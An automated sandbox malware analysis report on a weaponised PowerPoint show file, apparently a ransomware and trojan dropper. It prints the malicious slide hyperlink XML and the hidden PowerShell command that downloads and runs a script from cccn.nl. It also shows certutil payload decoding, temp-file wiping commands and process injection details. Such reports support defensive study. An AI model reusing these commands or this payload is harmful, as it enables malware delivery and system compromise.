Analysis Report

Overview

General Information

Joe Sandbox Version: 19.0.0
Analysis ID: 281044
Start time: 17:15:38
Joe Sandbox Product: Cloud
Start date: 28.05.2017
Overall analysis duration: 0h 11m 4s
Report type: full
Sample file name: order.ppsx
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 (Office 2010 v14.0.4, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed: 14
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies
  • HCA enabled
  • EGA enabled
  • VBA Instrumentation enabled
Detection: MAL
Classification: mal96.evad.rans.troj.winPPSX@15/8@1/3
HCA Information:
  • Successful, ratio: 92%
  • Number of executed functions: 34
  • Number of non-executed functions: 232
EGA Information:
  • Successful, ratio: 100%
Cookbook Comments:
  • Found application associated with file extension: .ppsx
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found security dialog
  • Click Ok
  • Number of clicks 104
  • Close Viewer
Warnings:
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: POWERPNT.EXE, powershell.exe


Detection

Strategy    Score   Range     Reporting        Detection
Threshold   96      0 - 100   Report FP / FN   malicious


Confidence

Strategy    Score   Range   Further Analysis Required?   Confidence
Threshold   5       0 - 5   false


Classification

Analysis Advice

Sample monitors Window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Sample sleeps for a long time, analyze it with the 'Bypass long sleeps' cookbook
Sample tries to load a library which is not present or installed on the analysis machine, update the analysis machine



Signature Overview



Spam, unwanted Advertisements and Ransom Demands:

Ransomware detected (based on file extension or ransom instructions from fsrm.experiant.ca)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\ii.jse

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read data from the clipboard
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6

Networking:

Downloads files from webservers via HTTP
Source: global traffic | HTTP traffic detected: GET /c.php HTTP/1.1, Host: cccn.nl, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /2.2 HTTP/1.1, Host: cccn.nl
Found strings which match known social media URLs
Source: wscript.exe | String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exe | String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exe | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: cccn.nl
URLs found in memory or binary data
HTTP GET or POST without a user agent
Source: global traffic | HTTP traffic detected: GET /c.php HTTP/1.1, Host: cccn.nl, Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /2.2 HTTP/1.1, Host: cccn.nl
Detected TCP or UDP traffic on non-standard ports
Source: global traffic | TCP traffic: 192.168.1.16:49235 -> 185.159.82.38:45000

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,10_2_0040C5E5
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006C5E5 GetProcessHeap,VirtualProtect,WSAStartup,socket,GetCurrentProcessId,GetProcessHeap,HeapAlloc,GetProcessWindowStation,inet_addr,htons,bind,GetProcessHeap,HeapFree,closesocket,GetProcessHeap,HeapFree,13_2_0006C5E5

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\certutil.exe | File created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
May use bcdedit to modify the Windows boot settings
Source: powershell.exe | Binary or memory string: bcdedit.exe
Source: wscript.exe | Binary or memory string: ~Wbcdedit.exe
Tries to download and execute files (via powershell)
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Contains a malicious href mouse-over action
Source: slide1.xml.rels | Binary or memory string: <Relationship Id="rId2" Target="powershell%20-NoP%20-NonI%20-W%20Hidden%20-Exec%20Bypass%20%22IEX%20(New-Object%20System.Net.WebClient).DownloadFile(%27http%3A%27%2B%5Bchar%5D%200x2F%2B%5Bchar%5D%200x2F%2B%27cccn.nl%27%2B%5Bchar%5D%200x2F%2B%27c.php%27%2C%5C%22%24env%3Atemp%5Cii.jse%5C%22)%3B%20Invoke-Item%20%5C%22%24env%3Atemp%5Cii.jse%5C%22%22" TargetMode="External" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink"/>

Data Obfuscation:

Contains functionality to dynamically determine API calls
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040EFB9 EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,LoadLibraryA,GetProcAddress,GetCommandLineW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetModuleFileNameW,GetProcessHeap,RtlAllocateHeap,IsSystemResumeAutomatic,GetProcessHeap,GetModuleHandleW,ExitProcess,GetCurrentProcess,GetVersion,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,GetActiveWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,ExpandEnvironmentStringsW,StrStrIW,StrStrIW,StrStrIW,CreateThread,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,Sleep,10_2_0040EFB9
PE file contains an invalid checksum
Source: 484.exe.2988.dr | Static PE information: real checksum: 0x0 should be: 0x3aa9d
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_1_00404048 push eax; retf 10_1_00404077
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_1_00405C9C push eax; ret 10_1_00405DDC
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_1_00403FDF push eax; retf 10_1_00404046
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_1_00404F91 push edx; retf 0065h 10_1_00404F9A
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''

Spreading:

Contains functionality to enumerate / list files inside a directory
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_004022E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_004022E6
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040DDBF
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_00401E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_00401E16
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,10_2_0040BB40
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_00061E16 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProfilesDirectoryW,GetProcessHeap,wsprintfW,FindFirstFileW,StrCmpW,StrCmpW,StrCpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,StrCatW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetDoubleClickTime,wsprintfW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapAlloc,GetDialogBaseUnits,ExpandEnvironmentStringsW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_00061E16
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_000622E6 GetProfilesDirectoryW,GetProfilesDirectoryW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProfilesDirectoryW,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetProcessHeap,FindFirstFileW,GetProcessHeap,HeapAlloc,GetCommandLineA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,lstrcmpW,GetProcessHeap,lstrcmpW,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCurrentProcessId,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,wsprintfW,GetFileAttributesW,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FindNextFileW,FindClose,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_000622E6
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006BB40 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,ReleaseCapture,GetProcessHeap,GetSystemDirectoryW,lstrcatW,FindFirstFileW,StrRChrW,FindNextFileW,FindFirstFileW,FindClose,GetProcessHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006BB40
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006DDBF lstrlenW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapFree,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,lstrcpyW,GetProcessHeap,HeapAlloc,GetProcessWindowStation,lstrcatW,lstrcpyW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,lstrcatW,FindFirstFileW,GetProcessHeap,lstrlenW,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,13_2_0006DDBF
Enumerates the file system
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft

System Summary:

Checks whether the correct version of .NET is installed
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\Upgrades
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
Checks if Microsoft Office is installed
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\PowerPoint\Resiliency\StartupItems
Uses new MSVCR DLLs
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to debug symbols
Source: Binary string: wscript.pdb source: wscript.exe
Source: Binary string: mscorrc.pdb source: powershell.exe
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe
Source: Binary string: indows\System.Management.Automation.pdbpdbion.pdb source: powershell.exe
Source: Binary string: System.Management.Automation.pdb source: powershell.exe
Source: Binary string: scrrun.pdb source: wscript.exe
Source: Binary string: wscript.pdbN source: wscript.exe
Classification label
Source: classification engine | Classification label: mal96.evad.rans.troj.winPPSX@15/8@1/3
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,10_2_0040468D
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,10_2_00401D22
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,13_2_00061D22
Source: C:\Windows\System32\mstsc.exe | Code function: 13_2_0006468D LookupPrivilegeValueA,AdjustTokenPrivileges,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,13_2_0006468D
Contains functionality to instantiate COM classes
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe | Code function: 10_2_0040D4CA GetProcessHeap,HeapAlloc,GetDesktopWindow,CoInitialize,CoCreateInstance,CoTaskMemFree,StrStrIW,StrStrIW,StrStrIW,StrCpyNW,GetFileAttributesW,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoTaskMemFree,CoUninitialize,GetProcessHeap,HeapFree,10_2_0040D4CA
Creates files inside the user directory
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\order.LNK
Creates temporary files
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE | File created: C:\Users\LUKETA~1\AppData\Local\Temp\CVRF8B7.tmp
Found command line output
Source: C:\Windows\System32\certutil.exe | Console Write: Input Length = 316762
Source: C:\Windows\System32\certutil.exe | Console Write: Output Length = 237568
Source: C:\Windows\System32\cmd.exe | Console Write: Access is denied.
Parts of this application use the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Queries process information (via WMI, Win32_Process)
Source: C:\Windows\System32\wscript.exe | WMI Queries: IWbemServices::ExecQuery - Select * from Win32_Process
Reads ini filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEFile read: C:\Users\desktop.ini
Reads software policiesShow sources
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Spawns processesShow sources
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE 'C:\Program Files\Microsoft Office\Office14\powerpnt.exe' /s 'C:\order.ppsx'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: unknownProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: unknownProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse
Source: unknownProcess created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -NonI -W Hidden -Exec Bypass 'IEX (New-Object System.Net.WebClient).DownloadFile('http:'+[char] 0x2F+[char] 0x2F+'cccn.nl'+[char] 0x2F+'c.php',\'$env:temp\ii.jse\'); Invoke-Item \'$env:temp\ii.jse\''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\LUKETA~1\AppData\Local\Temp\ii.jse'
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\certutil.exe 'C:\Windows\System32\certutil.exe' -decode C:\Users\LUKETA~1\AppData\Local\Temp\168.gop C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c start C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /U /Q /C del /Q/F %TEMP%\*.exe && del /Q/F %TEMP%\*.gop && del /Q/F %TEMP%\*.txt && del /Q/F %TEMP%\*.log && del /Q/F %TEMP%\*.jse
Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe C:\Users\LUKETA~1\AppData\Local\Temp\484.exe
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeProcess created: C:\Windows\System32\mstsc.exe C:\Windows\System32\mstsc.exe 'C:\Users\LUKETA~1\AppData\Local\Temp\484.exe'
Uses an in-process (OLE) Automation server
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Contains functionality to call native functions
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F995 GetProcessHeap,CreateProcessW,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcAddress,NtCreateSection,CloseHandle,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F995
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_0040F6F4 GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardSequenceNumber,GetProcessHeap,HeapAlloc,GetShellWindow,GetModuleHandleA,GetProcAddress,NtMapViewOfSection,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,10_2_0040F6F4
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_0006E0EF NtQuerySystemInformation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetShellWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,ReleaseCapture,LoadLibraryA,GetProcAddress,GetProcessHeap,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,NtQuerySystemInformation,NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,VirtualFree,13_2_0006E0EF
Contains functionality to launch a process as a different user
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_004064D2 OpenProcess,ProcessIdToSessionId,CloseHandle,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,SetTokenInformation,AllocateAndInitializeSid,GetLengthSid,SetTokenInformation,FreeSid,SetTokenInformation,CreateEnvironmentBlock,GetProcessHeap,HeapAlloc,GetCaretBlinkTime,GetProcessHeap,HeapAlloc,CreatePopupMenu,CreateProcessAsUserW,CloseHandle,OpenProcessToken,CloseHandle,CloseHandle,DestroyEnvironmentBlock,CloseHandle,GetProcessHeap,HeapFree,HeapFree,GetProcessHeap,HeapFree,CloseHandle,CloseHandle,10_2_004064D2
Contains functionality to shutdown / reboot the system
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exeCode function: 10_2_00401D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,10_2_00401D22
Source: C:\Windows\System32\mstsc.exeCode function: 13_2_00061D22 GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,GetProcessHeap,ExitWindowsEx,GetProcessHeap,HeapFree,13_2_00061D22
Creates files inside the system directory
Source: C:\Windows\System32\certutil.exeFile created: C:\Windows\cerF439.tmp
Creates mutexes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Deletes Windows files
Source: C:\Windows\System32\certutil.exeFile deleted: C:\Windows\cerF439.tmp
Reads the hosts file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hosts
Tries to load missing DLLs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: api-ms-win-appmodel-runtime-l1-1-2.dll
